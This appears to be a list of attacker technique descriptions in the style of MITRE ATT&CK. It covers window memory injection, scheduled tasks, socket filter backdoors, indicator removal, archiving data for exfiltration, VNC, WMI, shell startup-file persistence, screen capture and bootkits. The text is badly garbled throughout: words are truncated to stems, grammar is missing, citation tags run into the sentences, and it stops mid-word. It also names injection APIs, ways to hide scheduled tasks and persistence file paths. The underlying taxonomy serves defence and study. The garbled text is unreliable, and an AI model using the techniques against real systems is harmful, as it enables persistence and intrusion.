extr window mem inject
advers inject malicy cod process via extr window mem ewm ord evad process-based defens wel poss elev privileg ewm inject method execut arbit cod address spac sep liv process cre window graph windows-based process must prescrib reg window class stip appear behavy via window proc funct handl input/output dat microsoft window class reg new window class includ request 40 byt ewm append alloc mem inst class ewm intend stor dat spec window spec apply program interfac ap funct set get valu microsoft getwindowlong funct microsoft setwindowlong funct although smal ewm larg enough stor 32-bit point oft us point window proc malw poss util mem loc part attack chain includ writ cod shar sect process mem plac point cod ewm invok execut return execut control address process ewm execut grant ewm inject allow access target process mem poss elev privileg writ payload shar sect also avoid us high monit ap cal cod writeprocessmem /code cod createremotethread /code elast process inject july 2017 soph malw sampl also pot bypass protect mech dat execut prev dep trig combin window proc system funct rewrit malicy payload insid execut port target process malwaretech pow load aug 2013 welivesec gapz redym mar 2013 run cod context anoth process allow access process mem system/network resourc poss elev privileg execut via ewm inject also evad detect sec produc sint execut mask legitim process
schedule task
advers abus window task scheduler perform task schedule init rec execut malicy cod multipl way access task scheduler window schtasks http util run direct command lin task scheduler op gui within admin tool sect control panel cas advers us .net wrap window task scheduler altern advers us window netapi32 libr cre schedule task deprec http util could also abus advers ex http though cod at.exe /code access task cre cod schtasks /code control panel advers us window task scheduler execut program system startup schedule bas persist window task scheduler also abus conduc remot execut part lat mov and/or run process context spec account system simil system bin proxy execut http advers also abus window task scheduler pot mask one-tim execut signed/trust system process proofpoint serp advers also cre hid schedule task i.e hid artifact http vis defend tool man query us enum task spec advers hid task schtasks /query task scheduler delet assocy sec describ sd reg valu delet valu must complet us system permit sigmahq tarrask schedule task advers also employ altern method hid task alt metadat index valu within assocy reg key defend schedule task attack window environ
socket filt
advers attach filt network socket monit act backdo us persist command control elev permit advers us feat libpcap libr op socket instal filt allow disallow certain typ dat com socket filt apply traff pass spec network interfac every interfac spec network interfac receiv packet match filt crit addit act trig host act revers shel est connect advers send craft packet target host match inst filt crit haking9 libpcap network sniff advers us socket filt trig instal impl conduc ping back invok command shel commun socket filt also us conjunct protocol tunnel http exatrack bpf filt pass backdo leonardo turl penquin 2020 filt inst unix-like platform libpcap inst window host us winpcap advers us eith libpcap pcap_setfilter standard libr funct setsockopt so_attach_filter opt sint socket connect act packet receiv behavy difficult detect due lack act host low cpu overhead limit vis raw socket us
ind remov tool
malicy tool detect quarantin otherw curtail advers abl determin malicy tool detect ind mod tool remov ind us upd vert long detect target defend system subsequ target us simil system good exampl malw detect fil sign quarantin anti-virus softw advers determin malw quarantin fil sign us softw pack http otherw mod fil diff sign re-us malw
arch via util
advers us util compress and/or encrypt collect dat pri exfilt many util includ funct compress encrypt otherw pack dat form easier/more sec transport advers abus vary util compress encrypt dat exfilt third party util preinstal cod tar /code linux maco cod zip /code window system window cod diantz /code cod makecab /code us pack collect fil cabinet .cab fil cod diantz /code also us download compress fil remot loc i.e remot dat stag http diantz.exe_lolbas addit cod xcop /code window cop fil direct vary opt advers us also third party util 7-zip winr winzip perform simil act 7zip homep winr homep winzip homep
vnc
advers us valid account http remot control machin us virt network comput vnc vnc platform-independent desktop shar system us rfb remot framebuff protocol en us remot control anoth comput display relay screen mous keyboard input network remot framebuff protocol vnc diff remot desktop protocol http vnc screen-sharing softw rath resource-sharing softw default vnc us system auth config us cred spec vnc maco vnc softw remot desktop vnc auth advers abus vnc perform malicy act logged-on us op docu download fil run arbit command advers could us vnc remot control monit system collect dat inform pivot system within network spec vnc libraries/implementation also suscept brut forc attack mem us exploit hijack vnc maco root vnc login without auth vnc vuln offend sec vnc auth check attack vnc serv pentestlab havan auth bug
window man instru
advers abus window man instru wmi execut malicy command payload wmi admin feat provid uniform environ access window system compon wmi serv en loc remot access though lat facilit remot serv http distribut compon object model http dcom window remot man http winrm msdn wmi remot wmi dcom op us port 135 wherea wmi winrm op port 5985 us http 5986 http msdn wmi fireey wmi 2015 advers us wmi interact loc remot system us mean execut vary behavy gath inform discovery wel remot execut fil part lat mov fireey wmi san 2015 fireey wmi 2015
malicy shel mod
advers est persist execut malicy command trig us shel us shel execut sev config script diff point throughout sess bas ev exampl us op command lin interfac remot log ssh login shel in login shel execut script system /etc us hom direct config environ login shel system us cod /etc/profile /code in config script run permit level direct oft us set environ vary cre alia custom us environ shel exit termin addit shel script execut ens shel exit appropry advers attempt est persist insert command script autom execut shel us bash exampl default shel gnu/linux system advers ad command launch malicy bin cod /etc/profile /code cod /etc/profile.d /code fil intezer-kaiji-malware fil requir root permit execut tim shel system launch us level permit advers insert malicy command cod ~/.bash_profile /code cod ~/.bash_login /code cod ~/.profile /code rock sourc us op command lin interfac connect remot advers oft us ~/.bash_profile sint system execut first fil ex list ord advers also lev cod ~/.bashrc /code fil tsunam rock linux rabbit magento addit execut connect est remot addit interact shel op new tab command lin interfac malw target termin program trig execut cannon advers us cod ~/.bash_logout /code fil execut malicy command end sess pearl_shellbot maco funct techn simil lev zsh default shel maco 10.15+ terminal.app op apply launch zsh login shel zsh interact shel login shel config system environ us cod /etc/profile /code cod /etc/zshenv /code cod /etc/zprofile /code cod /etc/zlogin /code login shel config us environ cod ~/.zprofile /code cod ~/.zlogin /code interact shel us cod ~/.zshrc cod config us environ upon exit cod /etc/zlogout /code cod ~/.zlogout /code execut leg program maco execut cod /etc/bashrc /code startup
screen capt
advers attempt tak screen capt desktop gath inform cours op screen capt funct includ feat remot access tool us post-compromise op tak screenshot also typ poss nat util ap cal cod copyfromscreen /code cod xwd /code cod screencapture /code copyfromscreen .net ant mac malw
bootkit
bootkit malw vary mod boot sect hard driv includ mast boot record mbr volum boot record vbr mtrends 2016 a